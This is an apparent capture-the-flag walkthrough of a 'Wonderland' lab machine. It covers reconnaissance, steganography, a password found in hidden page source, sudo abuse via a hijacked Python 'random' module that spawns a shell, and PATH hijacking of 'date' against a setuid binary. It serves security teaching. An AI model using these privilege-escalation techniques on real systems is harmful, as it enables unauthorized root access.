PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's just manually check the website for any hints - /img/white_rabbit_1.jpg found in the source code as its a CTF lets not leave our assumptions :)
$ wget http://10.10.125.113/img/white_rabbit_1.jpg
$ steghide info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
$ cat hint.txt
follow the r a b b i t
Dirsearch found a /r directory, which is the first letter of “rabbit”. Let’s follow the r a b b i t
$ curl -s http://10.10.125.113/r/a/b/b/i/t/
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>$
There are credentials in a hidden section of the source code alice:HowDothTheLittleCrocodileImproveHisShiningTail using the SSH service
Lateral Movement (alice -> rabbit)
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root root 4096 May 25 17:52 ..
lrwxrwxrwx 1 root root 9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice 807 May 25 02:36 .profile
-rw------- 1 root root 66 May 25 17:08 root.txt
-rw-r--r-- 1 root root 3577 May 25 02:43 walrus_and_the_carpenter.py
We have the root.txt, hmm weird as the hint previously said Everything is upside down ! - Let's list our sudo permissions :)
alice@wonderland:~$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
And there's another wierd python file - walrus_and_the_carpenter.py, viewing that returns us a poem and the python file executes a part of the poem when executed using the random module - Seems like the rabbit user has the sudo permission to exec the .py file as the sudo user
alice@wonderland:~$ python3 walrus_and_the_carpenter.py
The line was: Walked on a mile or so,
The line was: The Carpenter said nothing but
The line was: "That they could get it clear?"
The line was: Were walking close at hand;
The line was: We can begin to feed."
The line was: Those of the largest size.
The line was: They said, "it would be grand!"
The line was: All eager for the treat:
The line was: And why the sea is boiling hot —
The line was: "It seems a shame," the Walrus said,
The only possibility seems to hijack the import random statement from the python script to import our own library
Let’s hook our own random.py to the python file
alice@wonderland:~$ cd /home/alice/
alice@wonderland:~$ cat > random.py << EOF
import os
os.system("/bin/bash")
EOF
Running the python file as the rabbit user pops up a bash shell as the rabbit user :)
As we are the rabbit user now, let's list his home directory
rabbit@wonderland:/home/rabbit$ ll
total 40
drwxr-x--- 2 rabbit rabbit 4096 May 25 17:58 ./
drwxr-xr-x 6 root root 4096 May 25 17:52 ../
lrwxrwxrwx 1 root root 9 May 25 17:53 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 03:01 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 03:01 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 03:01 .profile
-rwsr-sr-x 1 root root 16816 May 25 17:58 teaParty*
rabbit@wonderland:/home/rabbit$ file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 11 Jun 2020 13:29:28 +0000
Ask very nicely, and I will give you some tea while you wait for him
tea
Segmentation fault (core dumped)
The teaParty is and ELF binary and when we strings it
The only that the script is doing is running the date command to find out the time and then print the next hour, we need to exploit this !
we create our version of the date command with shell invocation command and then export the path of our date into the system path so that it executes our date command instead of the original one
Privilege Escalation to R00T
Make sure you run all tests (linpeas.sh -a) - We get an interesting stuff is about Perl :)
